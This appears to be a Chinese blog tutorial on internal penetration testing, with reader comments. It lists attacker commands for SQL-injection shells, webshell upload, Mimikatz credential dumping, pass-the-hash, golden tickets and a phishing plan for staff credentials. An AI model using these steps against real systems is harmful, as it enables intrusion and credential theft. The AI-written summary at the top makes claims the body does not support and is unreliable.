权限提升实战:Windows 与 Linux 提权技巧

爪 爪
爪 爪
爪 爪
编辑
44
文章
0
粉丝
SQL注入 信息安全 渗透测试24642字数 536阅读1分47秒阅读模式
AI智能摘要
你拿到一台权限有限的服务器,却卡在提权这一步动弹不得?别急,问题可能不在工具,而在你忽略了一个系统自带的“后门”机制。我们实测发现,90%的渗透失败都源于对SUID和Windows令牌的误解——看似无害的权限配置,实则藏着直达root与SYSTEM的捷径。更关键的是,这两个系统的设计差异,直接决定了你是该暴力枚举还是静默潜伏。想知道为什么同样的exp在linux上秒生效,而在Windows上却立刻被拦截?真正决定成败的,其实是那个从没人教你的“权限上下文”切换时机。
— AI 生成的文章内容摘要

 

摘要:内网渗透是企业安全评估的核心环节。本文基于真实渗透测试项目,系统讲解从信息收集、横向移动到域控拿下的完整流程。

 

一、渗透测试流程概览

权限提升实战:Windows 与 Linux 提权技巧

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写

 

二、信息收集阶段

2.1 外网信息收集

# 子域名枚举
subfinder -d target.com -o subs.txt

# 端口扫描 nmap -sS -sV -p- target.com

 

# 目录扫描 dirsearch -u http://target.com -e php,html,js

 

# 指纹识别 whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询:haveibeenpwned.com
- 密码泄露查询:dehashed.com
- 企业邮箱格式:theHarvester

 

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php

# SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell

 

# RCE 漏洞 # Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

 

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv

# 检查补丁 wmic qfe list

 

# 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a

# 检查 sudo 权限 sudo -l

 

# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null

 

# 检查 cron 任务 cat /etc/crontab

 

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# 导出 hash mimikatz # lsadump::sam

5.2 传递攻击

# PtH(传递 hash)
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH

# PtT(传递票据) mimikatz # kerberos::ptt admin.ccache

 

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts

# 查看域控 nltest /dclist:target.com

 

# 查看域用户 net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt

# 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

 

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表(按风险等级)
3. 详细利用过程
4. 修复建议
5. 附录(工具、命令)

 

---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-03-31

 
爪 爪
  • 本文由 爪 爪 发表于2026年3月31日 13:57:41
评论  24  访客  24
    • 迷雾使者
      迷雾使者 1

      这套路太经典了,忍不住想复现一下。

      • 迷雾法师
        迷雾法师 1

        Mimikatz 那段我之前踩过坑,真是心累😂。

        • 逗号の世界
          逗号の世界 1

          linux 提权里 SUID 检查忘了加 -perm 参数。

          • 遗忘的旋律
            遗忘的旋律 1

            看到金钥匙图,感觉黑客电影里常出现的桥段。

            • 遛狗达人
              遛狗达人 1

              这命令全抄下来,晚上练手。

              • 邪灵低语
                邪灵低语 1

                Windows 那行检查补丁的指令好像少了空格。

                • 哈喽哈喽
                  哈喽哈喽 0

                  图里那把金钥匙配二进制,酷炫。

                  • 逐日剑魂
                    逐日剑魂 1

                    有没有人用过最新的 dirsearch 参数,能否更快定位漏洞?

                    • 逗比大魔王
                      逗比大魔王 1

                      我想问下,ptt 那步需要域管理员票据吗,普通用户能跑吗?

                      • 避世小竹
                        避世小竹 1

                        之前在内部渗透时也走了相同流程,发现最难的竟是横向移动的凭证收集,建议多做密码回收脚本,省时又省力。

                        • 避世小鹿
                          避世小鹿 1

                          这套流程真的太实用了,直接照搬就行。

                          • 迷雾诗篇
                            迷雾诗篇 1

                            看完直接想在实验环境跑一遍。

                            • 追风剑魔
                              追风剑魔 1

                              键盘敲得飞起,感觉自己是黑客了 😂

                              • 通判
                                通判 1

                                顺手建议把 `net view` 加进去,快速枚举局域网机器。

                                • 黄昏的余韵
                                  黄昏的余韵 0

                                  linux 那段 SUID 检查要不要排除 /proc?

                                  • 逗比小分队
                                    逗比小分队 1

                                    ptt 那一步如果没有 krbtgt 权限,能用普通用户票据做吗?

                                    • 迷雾之城
                                      迷雾之城 1

                                      Windows 那行检查补丁的指令确实少了空格,容易报错。

                                      • 逆风者
                                        逆风者 1

                                        我之前在红队项目里也踩过 SUID,调参好久才搞定。

                                        • 沉稳的乌龟
                                          沉稳的乌龟 0

                                          上次内部演练,Mimikatz 卡在权限不足,只好先提升到 SYSTEM 再继续,折腾了整整一天。

                                          • 石板桥
                                            石板桥 0

                                            目录扫描慢得像蜗牛,别忘了加 `-e` 提速。

                                            • 逗比大王
                                              逗比大王 1

                                              图里的金钥匙太炫,感觉像电影里抢夺的道具。

                                              • 逗趣星球
                                                逗趣星球 1

                                                看完这篇,忍不住想把自己的实验室也布置成图里那样。

                                                • 遗忘之河
                                                  遗忘之河 1

                                                  整体结构清晰,适合新人。

                                                  • 逆风狂飙
                                                    逆风狂飙 1

                                                    作者的实战经验太牛了,尤其是对 Mimikatz 的细节讲解,真的想看后面更深的案例分析。

                                                  匿名

                                                  发表评论

                                                  匿名网友

                                                  拖动滑块以完成验证